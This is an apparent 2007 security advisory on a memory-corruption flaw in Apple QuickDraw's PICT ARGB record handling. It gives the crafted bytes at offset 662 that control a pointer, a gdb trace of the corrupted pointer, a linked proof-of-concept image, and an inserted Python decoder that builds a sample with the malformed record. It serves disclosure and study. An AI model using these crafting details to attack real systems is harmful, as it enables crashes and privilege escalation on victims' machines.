Tuesday, 23 January 2007

Apple QuickDraw GetSrcBits32ARGB() Memory Corruption Vulnerability

Vendor:: Apple
Application:: Mac OS X
Disclosed:: 23-01-07
Description:: QuickDraw has been part of Mac OS X since its earliest versions and is used by QuickTime and any other application that needs to handle PICT images. A vulnerability exists in the handling of ARGB (Alpha RGB) records within PICT images that leads to an exploitable memory corruption condition (e.g. denial of service, the so-called crash, which can be used to gain root privileges in combination with MOAB-22-01-2007).
Exploit:: A specially crafted PICT image with a malformed ARGB record can abuse this issue to subvert the pointer passed to the _GetSrcBits32ARGB() function. Up to 3 bytes of the pointer can be controlled; the last one is a fixed value (0x70, incremental) and isn't influenced by the image data structure:
at offset 662:

06 ED BB ED AD ED DE
[length] [-] [R] [-] [G] [-] [B]

ADED -> 0xdead
BB+0x03 -> 0xbe
plus fixed value: 0x70

result: 0xdeadbe70

This is enough to point at a completely different address
(e.g. heap or stack space, user controlled). A valid address will most probably
let the application continue execution, while an invalid one will lead to
a memory access violation (KERN_INVALID_ADDRESS exception).

06 ED BB ED AD ED BF
[length] [-] [R] [-] [G] [-] [B]
result: 0xbfadbe70
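As an added illustration (not part of the original advisory), the decoder below reproduces the byte-to-pointer mapping described above for a 7-byte ARGB record, extracts the record at a given file offset from a constructed sample, and shows the bounds check a parser would need before using such a value. The meaning of the "[-]" filler bytes and the PICT framing around the record are not described on the page, so the code only checks the length byte and leaves the filler uninterpreted.

```python
from typing import NamedTuple

FIXED_LOW_BYTE = 0x70   # low byte the advisory says is not image-controlled
RED_BIAS = 0x03         # the advisory's "BB+0x03 -> 0xbe"
RECORD_LEN = 7          # [length] [-] [R] [-] [G] [-] [B]
ARGB_OFFSET = 662       # offset quoted in the advisory


class ArgbRecord(NamedTuple):
    length: int
    r: int
    g: int
    b: int


def parse_argb_record(rec: bytes) -> ArgbRecord:
    """Split one 7-byte ARGB record into named fields (filler bytes ignored)."""
    if len(rec) != RECORD_LEN:
        raise ValueError(f"expected {RECORD_LEN} bytes, got {len(rec)}")
    if rec[0] != 0x06:  # length byte seen in both records on the page
        raise ValueError(f"unexpected length byte 0x{rec[0]:02x}")
    return ArgbRecord(length=rec[0], r=rec[2], g=rec[4], b=rec[6])


def derived_pointer(rec: ArgbRecord) -> int:
    """Pointer value as the advisory describes it: B in the top byte, G next,
    R+3 (truncated to a byte) next, then the fixed low byte 0x70."""
    return ((rec.b << 24) | (rec.g << 16)
            | (((rec.r + RED_BIAS) & 0xFF) << 8) | FIXED_LOW_BYTE)


def pointer_at_offset(data: bytes, offset: int = ARGB_OFFSET) -> int:
    """Decode the ARGB record found at `offset` in a PICT byte string."""
    return derived_pointer(parse_argb_record(data[offset:offset + RECORD_LEN]))


def pointer_in_buffer(ptr: int, base: int, size: int) -> bool:
    """The check the advisory implies is missing: a derived pointer must stay
    inside the pixel buffer it is supposed to address."""
    return base <= ptr < base + size


# Constructed sample: zero padding with the page's first record at offset 662.
SAMPLE_PICT = bytes(ARGB_OFFSET) + bytes.fromhex("06EDBBEDADEDDE") + bytes(32)
```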


(gdb) break *0x91782c44
Breakpoint 1 at 0x91782c44
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
(...)
Reading symbols for shared libraries . done

Breakpoint 1, 0x91782c44 in _GetSrcBits32ARGB ()
(gdb) x/4x $eax
0xbfadbe70: 0x00000000 0x00000000 0x00000000 0x00000000

Once execution continues, the address is repeatedly incremented:

Breakpoint 1, 0x91782c44 in _GetSrcBits32ARGB ()
(gdb) p (void *)$eax
$2 = (void *) 0xbfadbe90
(gdb) c
Breakpoint 1, 0x91782c44 in _GetSrcBits32ARGB ()
(gdb) p (void *)$eax
$3 = (void *) 0xbfadbe94
(gdb) c
Breakpoint 1, 0x91782c44 in _GetSrcBits32ARGB ()
(gdb) p (void *)$eax
$4 = (void *) 0xbfadbe98
(gdb) c
Breakpoint 1, 0x91782c44 in _GetSrcBits32ARGB ()
(gdb) p (void *)$eax
$5 = (void *) 0xbfadbe9c
(...)

While arbitrary code execution might be possible, until further research is done it can't be stated as a currently viable condition.
Links::
MOAB-23-01-2007
PoC:: MOAB-23-01-2007.pct